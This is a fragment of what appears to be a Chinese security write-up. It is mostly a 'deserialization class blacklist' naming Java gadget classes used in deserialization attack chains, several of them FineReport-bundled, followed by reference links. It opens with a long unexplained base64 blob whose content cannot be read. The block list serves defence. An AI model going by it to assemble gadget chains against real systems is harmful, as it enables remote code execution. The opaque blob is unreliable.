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
image-20240306164147580

反序列化类黑名单


bsh.XThis
bsh.Interpreter
com.mchange.v2.c3p0.PoolBackedDataSource
com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase
clojure.lang.PersistentArrayMap
clojure.inspector.proxy$javax.swing.table.AbstractTableModel$ff19274a
org.apache.commons.beanutils.BeanComparator
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors.ChainedTransformer
org.apache.commons.collections.functors.ConstantTransformer
org.apache.commons.collections.functors.InstantiateTransformer
org.apache.commons.collections.map.LazyMap
org.apache.commons.collections.functors.InvokerTransformer
org.apache.commons.collections.keyvalue.TiedMapEntry
org.apache.commons.collections.map.TransformedMap
org.apache.commons.collections.functors.MapTransformer
org.apache.commons.collections.comparators.TransformingComparator
org.apache.commons.collections4.Transformer
org.apache.commons.collections4.comparators.TransformingComparator
org.apache.commons.collections4.functors.InvokerTransformer
org.apache.commons.collections4.functors.ChainedTransformer
org.apache.commons.collections4.functors.ConstantTransformer
org.apache.commons.collections4.functors.InstantiateTransformer
org.apache.commons.collections4.map.LazyMap
org.apache.commons.collections4.keyvalue.TiedMapEntry
org.apache.commons.collections4.map.TransformedMap
org.apache.commons.collections4.functors.MapTransformer
org.apache.commons.fileupload.disk.DiskFileItem
org.apache.commons.io.output.DeferredFileOutputStream
org.apache.commons.io.output.ThresholdingOutputStream
com.fr.third.org.apache.commons.beanutils.BeanComparator
com.fr.third.org.apache.commons.collections.Transformer
com.fr.third.org.apache.commons.collections.comparators.TransformingComparator
com.fr.third.org.apache.commons.collections.functors.ChainedTransformer
com.fr.third.org.apache.commons.collections.functors.ConstantTransformer
com.fr.third.org.apache.commons.collections.functors.InstantiateTransformer
com.fr.third.org.apache.commons.collections.map.LazyMap
com.fr.third.org.apache.commons.collections.functors.MapTransformer
com.fr.third.org.apache.commons.collections.functors.InvokerTransformer
com.fr.third.org.apache.commons.collections.keyvalue.TiedMapEntry
com.fr.third.org.org.apache.commons.collections.map.TransformedMap
com.fr.third.org.apache.commons.collections4.comparators.TransformingComparator
com.fr.third.org.apache.commons.collections4.functors.InvokerTransformer
com.fr.third.org.apache.commons.collections4.functors.ChainedTransformer
com.fr.third.org.apache.commons.collections4.functors.ConstantTransformer
com.fr.third.org.apache.commons.collections4.functors.InstantiateTransformer
com.fr.third.org.apache.commons.collections4.keyvalue.TiedMapEntry
com.fr.third.org.org.apache.commons.collections4.map.TransformedMap
com.fr.third.org.apache.commons.collections4.map.LazyMap
com.fr.third.org.apache.commons.collections4.functors.MapTransformer
com.fr.third.org.apache.commons.collections4.Transformer
com.fr.third.org.apache.commons.fileupload.disk.DiskFileItem
com.fr.third.org.apache.commons.io.output.DeferredFileOutputStream
com.fr.third.org.apache.commons.io.output.ThresholdingOutputStream
org.apache.wicket.util.upload.DiskFileItem
org.apache.wicket.util.io.DeferredFileOutputStream
org.apache.wicket.util.io.ThresholdingOutputStream
org.codehaus.groovy.runtime.ConvertedClosure
org.codehaus.groovy.runtime.MethodClosure
org.hibernate.engine.spi.TypedValue
org.hibernate.tuple.component.AbstractComponentTuplizer
org.hibernate.tuple.component.PojoComponentTuplizer
org.hibernate.type.AbstractType
org.hibernate.type.ComponentType
org.hibernate.type.Type
org.hibernate.EntityMode
com.fr.third.org.hibernate.engine.spi.TypedValue
com.fr.third.org.hibernate.tuple.component.AbstractComponentTuplizer
com.fr.third.org.hibernate.tuple.component.PojoComponentTuplizer
com.fr.third.org.hibernate.type.AbstractType
com.fr.third.org.hibernate.type.ComponentType
com.fr.third.org.hibernate.type.Type
com.fr.third.org.hibernate.EntityMode
com.sun.rowset.JdbcRowSetImpl
org.jboss.interceptor.builder.InterceptionModelBuilder
org.jboss.interceptor.builder.MethodReference
org.jboss.interceptor.proxy.DefaultInvocationContextFactory
org.jboss.interceptor.proxy.InterceptorMethodHandler
org.jboss.interceptor.reader.ClassMetadataInterceptorReference
org.jboss.interceptor.reader.DefaultMethodMetadata
org.jboss.interceptor.reader.ReflectiveClassMetadata
org.jboss.interceptor.reader.SimpleInterceptorMetadata
org.jboss.interceptor.spi.instance.InterceptorInstantiator
org.jboss.interceptor.spi.metadata.InterceptorReference
org.jboss.interceptor.spi.metadata.MethodMetadata
org.jboss.interceptor.spi.model.InterceptionType
org.jboss.interceptor.spi.model.InterceptionModel
sun.rmi.server.UnicastRef
sun.rmi.transport.LiveRef
sun.rmi.transport.tcp.TCPEndpoint
java.rmi.server.RemoteObject
java.rmi.server.RemoteRef
java.rmi.server.ObjID
java.rmi.RemoteObjectInvocationHandler
java.rmi.server.UnicastRemoteObject
java.rmi.registry.Registry
sun.rmi.server.ActivationGroupImpl
sun.rmi.server.UnicastServerRef
org.springframework.aop.framework.AdvisedSupport
net.sf.json.JSONObject
javax.xml.transform.Templates
org.jboss.weld.interceptor.builder.InterceptionModelBuilder
org.jboss.weld.interceptor.builder.MethodReference
org.jboss.weld.interceptor.proxy.DefaultInvocationContextFactory
org.jboss.weld.interceptor.proxy.InterceptorMethodHandler
org.jboss.weld.interceptor.reader.ClassMetadataInterceptorReference
org.jboss.weld.interceptor.reader.DefaultMethodMetadata
org.jboss.weld.interceptor.reader.ReflectiveClassMetadata
org.jboss.weld.interceptor.reader.SimpleInterceptorMetadata
org.jboss.weld.interceptor.spi.instance.InterceptorInstantiator
org.jboss.weld.interceptor.spi.metadata.InterceptorReference
org.jboss.weld.interceptor.spi.metadata.MethodMetadata
org.jboss.weld.interceptor.spi.model.InterceptionModel
org.jboss.weld.interceptor.spi.model.InterceptionType
org.python.core.PyObject
org.python.core.PyBytecode
org.python.core.PyFunction
org.apache.myfaces.context.servlet.FacesContextImpl
org.apache.myfaces.context.servlet.FacesContextImplBase
org.apache.myfaces.el.CompositeELResolver
org.apache.myfaces.el.unified.FacesELContext
org.apache.myfaces.view.facelets.el.ValueExpressionMethodExpression
com.sun.syndication.feed.impl.ObjectBean
org.springframework.beans.factory.ObjectFactory
org.springframework.core.SerializableTypeWrapper.$MethodInvokeTypeProvider
org.springframework.aop.framework.AdvisedSupport
org.springframework.aop.target.SingletonTargetSource
org.springframework.aop.framework.JdkDynamicAopProxy
org..springframework.transaction.jta.JtaTransactionManager
com.fr.third.springframework.beans.factory.ObjectFactory
com.fr.third.springframework.core.SerializableTypeWrapper.$MethodInvokeTypeProvider
com.fr.third.springframework.aop.framework.AdvisedSupport
com.fr.third.springframework.aop.target.SingletonTargetSource
com.fr.third.springframework.aop.framework.JdkDynamicAopProxy
com.fr.third.springframework.transaction.jta.JtaTransactionManager
com.vaadin.data.util.NestedMethodProperty
com.vaadin.data.util.PropertysetItem
java.util.PriorityQueue
java.lang.reflect.Proxy
javax.management.MBeanServerInvocationHandler
javax.management.openmbean.CompositeDataInvocationHandler
java.beans.EventHandler
java.util.Comparator
org.reflections.Reflections
com.fr.third.org.reflections.Reflections

参考文章

https://tttang.com/archive/1701/#toc__9

https://xz.aliyun.com/t/12509

https://xz.aliyun.com/t/13389

https://xz.aliyun.com/t/13900